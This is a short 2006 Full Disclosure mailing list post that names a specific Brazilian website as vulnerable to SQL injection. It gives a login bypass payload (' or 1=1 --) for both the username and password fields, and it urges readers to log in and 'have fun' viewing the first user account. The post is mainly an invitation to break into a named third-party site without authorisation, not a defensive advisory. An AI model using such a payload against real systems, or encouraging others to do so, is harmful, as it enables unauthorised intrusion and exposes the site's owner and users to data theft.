Full Disclosure mailing list archives

SQL Injection - Vulnerable Brazilian Website ( AJAX / Web 2.0 )


From: "Fabio Neves Sarmento [ Gmail ]" <fabior2 () gmail com>
Date: Mon, 18 Dec 2006 14:29:35 -0200

Hello folks!!

This is the website. ( SQL Injection vulnerability )
Website deloped using web 2.0 concept, very very same as Google tools

http://www.misgood.com

USER: ' or 1=1 --
PASS: ' or 1=1 --

get logged! now you will see the first ID in the system.
Have fun.

- Quik
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread: